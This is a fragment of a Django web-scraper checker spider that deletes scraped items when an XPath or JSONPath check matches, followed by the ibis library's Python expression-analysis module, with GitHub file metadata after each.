c=str(checker), cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self.dds_logger.info("{cs}Item kept.{ce}".format(
cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]))
return
if rpt.content_type == 'J':
json_resp = json.loads(response.body_as_unicode())
try:
jsonpath_expr = parse(checker.checker_x_path)
except JsonPathLexerError:
msg = "Invalid checker JSONPath ({c})!".format(c=str(checker))
self.dds_logger.error(msg)
raise CloseSpider()
test_select = [match.value for match in jsonpath_expr.find(json_resp)]
#self.log(unicode(test_select), logging.INFO)
else:
try:
test_select = response.xpath(checker.checker_x_path).extract()
except ValueError:
self.log("Invalid checker XPath ({c})!".format(c=str(checker)), logging.ERROR)
return
if len(test_select) > 0 and checker.checker_x_path_result == '':
self.log("{cs}Elements for XPath found on page (no result string defined) ({c}). Delete reason.{ce}".format(
c=str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self._del_ref_object()
return
elif len(test_select) > 0 and test_select[0] == checker.checker_x_path_result:
self.log("{cs}XPath result string '{s}' found on page ({c}). Delete reason.{ce}".format(
s=checker.checker_x_path_result, c=str(checker), cs=self.bcolors["ERROR"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self._del_ref_object()
return
else:
self.log("{cs}XPath result string not found ({c}).{ce}".format(
c=str(checker), cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]), logging.INFO)
if self.conf['DO_ACTION']:
self.dds_logger.info("{cs}Item kept.{ce}".format(
cs=self.bcolors["OK"], ce=self.bcolors["ENDC"]))
return
| {
"content_hash": "84cf62b267962fd57d228f649a21f91a",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 156,
"avg_line_length": 45.03603603603604,
"alnum_prop": 0.5524104820964193,
"repo_name": "holgerd77/django-dynamic-scraper",
"id": "f86de816984df8ef01b153d4020d9ce3092c40f6",
"size": "10025",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dynamic_scraper/spiders/django_checker.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "9012"
},
{
"name": "JavaScript",
"bytes": "1698"
},
{
"name": "Python",
"bytes": "312719"
},
{
"name": "Shell",
"bytes": "6984"
}
],
"symlink_target": ""
} |
from ibis.common import RelationError, ExpressionError
from ibis.expr.window import window
import ibis.expr.types as ir
import ibis.expr.operations as ops
import ibis.util as util
# ---------------------------------------------------------------------
# Some expression metaprogramming / graph transformations to support
# compilation later
def sub_for(expr, substitutions):
helper = _Substitutor(expr, substitutions)
return helper.get_result()
class _Substitutor(object):
def __init__(self, expr, substitutions, sub_memo=None):
self.expr = expr
self.substitutions = substitutions
self._id_to_expr = {}
for k, v in substitutions:
self._id_to_expr[self._key(k)] = v
self.sub_memo = sub_memo or {}
self.unchanged = True
def get_result(self):
expr = self.expr
node = expr.op()
if getattr(node, 'blocking', False):
return expr
subbed_args = []
for arg in node.args:
if isinstance(arg, (tuple, list)):
subbed_arg = [self._sub_arg(x) for x in arg]
else:
subbed_arg = self._sub_arg(arg)
subbed_args.append(subbed_arg)
# Do not modify unnecessarily
if self.unchanged:
return expr
subbed_node = type(node)(*subbed_args)
if isinstance(expr, ir.ValueExpr):
result = expr._factory(subbed_node, name=expr._name)
else:
result = expr._factory(subbed_node)
return result
def _sub_arg(self, arg):
if isinstance(arg, ir.Expr):
subbed_arg = self.sub(arg)
if subbed_arg is not arg:
self.unchanged = False
else:
# a string or some other thing
subbed_arg = arg
return subbed_arg
def _key(self, expr):
return repr(expr.op())
def sub(self, expr):
key = self._key(expr)
if key in self.sub_memo:
return self.sub_memo[key]
if key in self._id_to_expr:
return self._id_to_expr[key]
result = self._sub(expr)
self.sub_memo[key] = result
return result
def _sub(self, expr):
helper = _Substitutor(expr, self.substitutions,
sub_memo=self.sub_memo)
return helper.get_result()
def substitute_parents(expr, lift_memo=None, past_projection=True):
rewriter = ExprSimplifier(expr, lift_memo=lift_memo,
block_projection=not past_projection)
return rewriter.get_result()
class ExprSimplifier(object):
"""
Rewrite the input expression by replacing any table expressions part of a
"commutative table operation unit" (for lack of scientific term, a set of
operations that can be written down in any order and still yield the same
semantic result)
"""
def __init__(self, expr, lift_memo=None, block_projection=False):
self.expr = expr
self.lift_memo = lift_memo or {}
self.block_projection = block_projection
def get_result(self):
expr = self.expr
node = expr.op()
if isinstance(node, ir.Literal):
return expr
# For table column references, in the event that we're on top of a
# projection, we need to check whether the ref comes from the base
# table schema or is a derived field. If we've projected out of
# something other than a physical table, then lifting should not occur
if isinstance(node, ops.TableColumn):
result = self._lift_TableColumn(expr, block=self.block_projection)
if result is not expr:
return result
# Temporary hacks around issues addressed in #109
elif isinstance(node, ops.Projection):
return self._lift_Projection(expr, block=self.block_projection)
elif isinstance(node, ops.Aggregation):
return self._lift_Aggregation(expr, block=self.block_projection)
unchanged = True
lifted_args = []
for arg in node.args:
lifted_arg, unch_arg = self._lift_arg(arg)
lifted_args.append(lifted_arg)
unchanged = unchanged and unch_arg
# Do not modify unnecessarily
if unchanged:
return expr
lifted_node = type(node)(*lifted_args)
if isinstance(expr, ir.ValueExpr):
result = expr._factory(lifted_node, name=expr._name)
else:
result = expr._factory(lifted_node)
return result
def _lift_arg(self, arg, block=None):
unchanged = [True]
def _lift(x):
if isinstance(x, ir.Expr):
lifted_arg = self.lift(x, block=block)
if lifted_arg is not x:
unchanged[0] = False
else:
# a string or some other thing
lifted_arg = x
return lifted_arg
if arg is None:
return arg, True
if isinstance(arg, (tuple, list)):
result = [_lift(x) for x in arg]
else:
result = _lift(arg)
return result, unchanged[0]
def lift(self, expr, block=None):
# This use of id() is OK since only for memoization
key = id(expr.op()), block
if key in self.lift_memo:
return self.lift_memo[key]
op = expr.op()
if isinstance(op, (ops.ValueNode, ops.ArrayNode)):
return self._sub(expr, block=block)
elif isinstance(op, ops.Filter):
result = self.lift(op.table, block=block)
elif isinstance(op, ops.Projection):
result = self._lift_Projection(expr, block=block)
elif isinstance(op, ops.Join):
result = self._lift_Join(expr, block=block)
elif isinstance(op, (ops.TableNode, ir.HasSchema)):
return expr
else:
raise NotImplementedError
# If we get here, time to record the modified expression in our memo to
# avoid excessive graph-walking
self.lift_memo[key] = result
return result
def _lift_TableColumn(self, expr, block=None):
node = expr.op()
tnode = node.table.op()
root = _base_table(tnode)
result = expr
if isinstance(root, ops.Projection):
can_lift = False
for val in root.selections:
if (isinstance(val.op(), ops.PhysicalTable) and
node.name in val.schema()):
can_lift = True
lifted_root = self.lift(val)
elif (isinstance(val.op(), ops.TableColumn) and
val.op().name == val.get_name() and
node.name == val.get_name()):
can_lift = True
lifted_root = self.lift(val.op().table)
# XXX
# can_lift = False
# HACK: If we've projected a join, do not lift the children
# TODO: what about limits and other things?
# if isinstance(root.table.op(), Join):
# can_lift = False
if can_lift and not block:
lifted_node = ops.TableColumn(node.name, lifted_root)
result = expr._factory(lifted_node, name=expr._name)
return result
def _lift_Aggregation(self, expr, block=None):
if block is None:
block = self.block_projection
op = expr.op()
lifted_table = self.lift(op.table, block=True)
unch = lifted_table is op.table
lifted_aggs, unch1 = self._lift_arg(op.agg_exprs, block=True)
lifted_by, unch2 = self._lift_arg(op.by, block=True)
lifted_having, unch3 = self._lift_arg(op.having, block=True)
unchanged = unch and unch1 and unch2 and unch3
if not unchanged:
lifted_op = ops.Aggregation(lifted_table, lifted_aggs,
by=lifted_by, having=lifted_having)
result = ir.TableExpr(lifted_op)
else:
result = expr
return result
def _lift_Projection(self, expr, block=None):
if block is None:
block = self.block_projection
op = expr.op()
if block:
lifted_table = op.table
unch = True
else:
lifted_table, unch = self._lift_arg(op.table, block=True)
lifted_selections, unch_sel = self._lift_arg(op.selections, block=True)
unchanged = unch and unch_sel
if not unchanged:
lifted_projection = ops.Projection(lifted_table, lifted_selections)
result = ir.TableExpr(lifted_projection)
else:
result = expr
return result
def _lift_Join(self, expr, block=None):
op = expr.op()
left_lifted = self.lift(op.left, block=block)
right_lifted = self.lift(op.right, block=block)
unchanged = (left_lifted is op.left and
right_lifted is op.right)
# Fix predicates
lifted_preds = []
for x in op.predicates:
subbed = self._sub(x, block=True)
if subbed is not x:
unchanged = False
lifted_preds.append(subbed)
if not unchanged:
lifted_join = type(op)(left_lifted, right_lifted, lifted_preds)
result = ir.TableExpr(lifted_join)
else:
result = expr
return result
def _sub(self, expr, block=None):
# catchall recursive rewriter
if block is None:
block = self.block_projection
helper = ExprSimplifier(expr, lift_memo=self.lift_memo,
block_projection=block)
return helper.get_result()
def _base_table(table_node):
# Find the aggregate or projection root. Not proud of this
if isinstance(table_node, ir.BlockingTableNode):
return table_node
else:
return _base_table(table_node.table.op())
def apply_filter(expr, predicates):
# This will attempt predicate pushdown in the cases where we can do it
# easily and safely
op = expr.op()
if isinstance(op, ops.Filter):
# Potential fusion opportunity. The predicates may need to be rewritten
# in terms of the child table. This prevents the broken ref issue
# (described in more detail in #59)
predicates = [sub_for(x, [(expr, op.table)]) for x in predicates]
return ops.Filter(op.table, op.predicates + predicates)
elif isinstance(op, (ops.Projection, ops.Aggregation)):
# if any of the filter predicates have the parent expression among
# their roots, then pushdown (at least of that predicate) is not
# possible
# It's not unusual for the filter to reference the projection
# itself. If a predicate can be pushed down, in this case we must
# rewrite replacing the table refs with the roots internal to the
# projection we are referencing
#
# If the filter references any new or derived aliases in the
#
# in pseudocode
# c = Projection(Join(a, b, jpreds), ppreds)
# filter_pred = c.field1 == c.field2
# Filter(c, [filter_pred])
#
# Assuming that the fields referenced by the filter predicate originate
# below the projection, we need to rewrite the predicate referencing
# the parent tables in the join being projected
# TODO: is partial pushdown (one or more, but not all of the passed
# predicates) something we should consider doing? Could be reasonable
# if isinstance(op, ops.Projection):
# else:
# # Aggregation
# can_pushdown = op.table.is_an
can_pushdown = _can_pushdown(op, predicates)
if can_pushdown:
predicates = [substitute_parents(x) for x in predicates]
# this will further fuse, if possible
filtered = op.table.filter(predicates)
result = op.substitute_table(filtered)
else:
result = ops.Filter(expr, predicates)
else:
result = ops.Filter(expr, predicates)
return result
def _can_pushdown(op, predicates):
# Per issues discussed in #173
#
# The only case in which pushdown is possible is that all table columns
# referenced must meet all of the following (not that onerous in practice)
# criteria
#
# 1) Is a table column, not any other kind of expression
# 2) Is unaliased. So, if you project t3.foo AS bar, then filter on bar,
# this cannot be pushed down (until we implement alias rewriting if
# necessary)
# 3) Appears in the selections in the projection (either is part of one of
# the entire tables or a single column selection)
can_pushdown = True
for pred in predicates:
validator = _PushdownValidate(op, pred)
predicate_is_valid = validator.get_result()
can_pushdown = can_pushdown and predicate_is_valid
return can_pushdown
class _PushdownValidate(object):
def __init__(self, parent, predicate):
self.parent = parent
self.pred = predicate
self.validator = ExprValidator([self.parent.table])
self.valid = True
def get_result(self):
self._walk(self.pred)
return self.valid
def _walk(self, expr):
node = expr.op()
if isinstance(node, ops.TableColumn):
is_valid = self._validate_column(expr)
self.valid = self.valid and is_valid
for arg in node.flat_args():
if isinstance(arg, ir.ValueExpr):
self._walk(arg)
# Skip other types of exprs
def _validate_column(self, expr):
if isinstance(self.parent, ops.Projection):
return self._validate_projection(expr)
else:
validator = ExprValidator([self.parent.table])
return validator.validate(expr)
def _validate_projection(self, expr):
is_valid = False
node = expr.op()
# Has a different alias, invalid
if _is_aliased(expr):
return False
for val in self.parent.selections:
if (isinstance(val.op(), ops.PhysicalTable) and
node.name in val.schema()):
is_valid = True
elif (isinstance(val.op(), ops.TableColumn) and
node.name == val.get_name() and
not _is_aliased(val)):
# Aliased table columns are no good
col_table = val.op().table.op()
lifted_node = substitute_parents(expr).op()
is_valid = (col_table.is_ancestor(node.table) or
col_table.is_ancestor(lifted_node.table))
# is_valid = True
return is_valid
def _is_aliased(col_expr):
return col_expr.op().name != col_expr.get_name()
def windowize_function(expr, w=None):
def _check_window(x):
# Hmm
arg, window = x.op().args
if isinstance(arg.op(), ops.RowNumber):
if len(window._order_by) == 0:
raise ExpressionError('RowNumber requires explicit '
'window sort')
return x
def _windowize(x, w):
if not isinstance(x.op(), ops.WindowOp):
walked = _walk(x, w)
else:
window_arg, window_w = x.op().args
walked_child = _walk(window_arg, w)
if walked_child is not window_arg:
walked = x._factory(ops.WindowOp(walked_child, window_w),
name=x._name)
else:
walked = x
op = walked.op()
if isinstance(op, (ops.AnalyticOp, ops.Reduction)):
if w is None:
w = window()
return _check_window(walked.over(w))
elif isinstance(op, ops.WindowOp):
if w is not None:
return _check_window(walked.over(w))
else:
return _check_window(walked)
else:
return walked
def _walk(x, w):
op = x.op()
unchanged = True
windowed_args = []
for arg in op.args:
if not isinstance(arg, ir.Expr):
windowed_args.append(arg)
continue
new_arg = _windowize(arg, w)
unchanged = unchanged and arg is new_arg
windowed_args.append(new_arg)
if not unchanged:
new_op = type(op)(*windowed_args)
return x._factory(new_op, name=x._name)
else:
return x
return _windowize(expr, w)
class Projector(object):
"""
Analysis and validation of projection operation, taking advantage of
"projection fusion" opportunities where they exist, i.e. combining
compatible projections together rather than nesting them. Translation /
evaluation later will not attempt to do any further fusion /
simplification.
"""
def __init__(self, parent, proj_exprs):
self.parent = parent
node = self.parent.op()
if isinstance(node, ops.Projection):
roots = [node]
else:
roots = node.root_tables()
self.parent_roots = roots
clean_exprs = []
validator = ExprValidator([parent])
for expr in proj_exprs:
# Perform substitution only if we share common roots
if validator.shares_some_roots(expr):
expr = substitute_parents(expr, past_projection=False)
expr = windowize_function(expr)
clean_exprs.append(expr)
self.clean_exprs = clean_exprs
def get_result(self):
roots = self.parent_roots
if len(roots) == 1 and isinstance(roots[0], ops.Projection):
fused_op = self._check_fusion(roots[0])
if fused_op is not None:
return fused_op
return ops.Projection(self.parent, self.clean_exprs)
def _check_fusion(self, root):
roots = root.table._root_tables()
validator = ExprValidator([root.table])
fused_exprs = []
can_fuse = False
for val in self.clean_exprs:
# XXX
lifted_val = substitute_parents(val)
# a * projection
if (isinstance(val, ir.TableExpr) and
(self.parent.op().is_ancestor(val) or
# gross we share the same table root. Better way to
# detect?
len(roots) == 1 and val._root_tables()[0] is roots[0])):
can_fuse = True
fused_exprs.extend(root.selections)
elif validator.validate(lifted_val):
fused_exprs.append(lifted_val)
elif not validator.validate(val):
can_fuse = False
break
else:
fused_exprs.append(val)
if can_fuse:
return ops.Projection(root.table, fused_exprs)
else:
return None
class ExprValidator(object):
def __init__(self, exprs):
self.parent_exprs = exprs
self.roots = []
for expr in self.parent_exprs:
self.roots.extend(expr._root_tables())
def has_common_roots(self, expr):
return self.validate(expr)
def validate(self, expr):
op = expr.op()
if isinstance(op, ops.TableColumn):
if self._among_roots(op.table.op()):
return True
elif isinstance(op, ops.Projection):
if self._among_roots(op):
return True
expr_roots = expr._root_tables()
for root in expr_roots:
if not self._among_roots(root):
return False
return True
def _among_roots(self, node):
for root in self.roots:
if root.is_ancestor(node):
return True
return False
def shares_some_roots(self, expr):
expr_roots = expr._root_tables()
return any(self._among_roots(root)
for root in expr_roots)
def validate_all(self, exprs):
for expr in exprs:
self.assert_valid(expr)
def assert_valid(self, expr):
if not self.validate(expr):
msg = self._error_message(expr)
raise RelationError(msg)
def _error_message(self, expr):
return ('The expression %s does not fully originate from '
'dependencies of the table expression.' % repr(expr))
class FilterValidator(ExprValidator):
"""
Filters need not necessarily originate fully from the ancestors of the
table being filtered. The key cases for this are
- Scalar reductions involving some other tables
- Array expressions involving other tables only (mapping to "uncorrelated
subqueries" in SQL-land)
- Reductions or array expressions like the above, but containing some
predicate with a record-specific interdependency ("correlated subqueries"
in SQL)
"""
def validate(self, expr):
op = expr.op()
is_valid = True
if isinstance(op, ops.Contains):
value_valid = ExprValidator.validate(self, op.value)
is_valid = value_valid
else:
roots_valid = []
for arg in op.flat_args():
if isinstance(arg, ir.ScalarExpr):
# arg_valid = True
pass
elif isinstance(arg, ir.ArrayExpr):
roots_valid.append(self.shares_some_roots(arg))
elif isinstance(arg, ir.Expr):
raise NotImplementedError
else:
# arg_valid = True
pass
is_valid = any(roots_valid)
return is_valid
def find_base_table(expr):
if isinstance(expr, ir.TableExpr):
return expr
for arg in expr.op().flat_args():
if isinstance(arg, ir.Expr):
r = find_base_table(arg)
if isinstance(r, ir.TableExpr):
return r
def find_source_table(expr):
# A more complex version of _find_base_table.
# TODO: Revisit/refactor this all at some point
node = expr.op()
# First table expression observed for each argument that the expr
# depends on
first_tables = []
def push_first(arg):
if not isinstance(arg, ir.Expr):
return
if isinstance(arg, ir.TableExpr):
first_tables.append(arg)
else:
collect(arg.op())
def collect(node):
for arg in node.flat_args():
push_first(arg)
collect(node)
options = util.unique_by_key(first_tables, id)
if len(options) > 1:
raise NotImplementedError
return options[0]
def unwrap_ands(expr):
out_exprs = []
def walk(expr):
op = expr.op()
if isinstance(op, ops.Comparison):
out_exprs.append(expr)
elif isinstance(op, ops.And):
walk(op.left)
walk(op.right)
else:
raise Exception('Invalid predicate: {0!s}'
.format(expr._repr()))
walk(expr)
return out_exprs
def find_backend(expr):
from ibis.client import Client
backends = []
def walk(expr):
node = expr.op()
for arg in node.flat_args():
if isinstance(arg, Client):
backends.append(arg)
elif isinstance(arg, ir.Expr):
walk(arg)
walk(expr)
backends = util.unique_by_key(backends, id)
if len(backends) > 1:
raise ValueError('Multiple backends found')
return backends[0]
| {
"content_hash": "f76ef3d9442f123bb3e364ae296ed8a0",
"timestamp": "",
"source": "github",
"line_count": 781,
"max_line_length": 79,
"avg_line_length": 30.52368758002561,
"alnum_prop": 0.5653341163639415,
"repo_name": "shaunstanislaus/ibis",
"id": "d7471e2dfd17fd4baf948af0087d84a635dfd3cb",
"size": "24413",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "ibis/expr/analysis.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "3684"
},
{
"name": "Makefile",
"bytes": "42"
},
{
"name": "Python",
"bytes": "766938"
},
{
"name": "Shell",
"bytes": "2116"
}
],
"symlink_target": ""
} |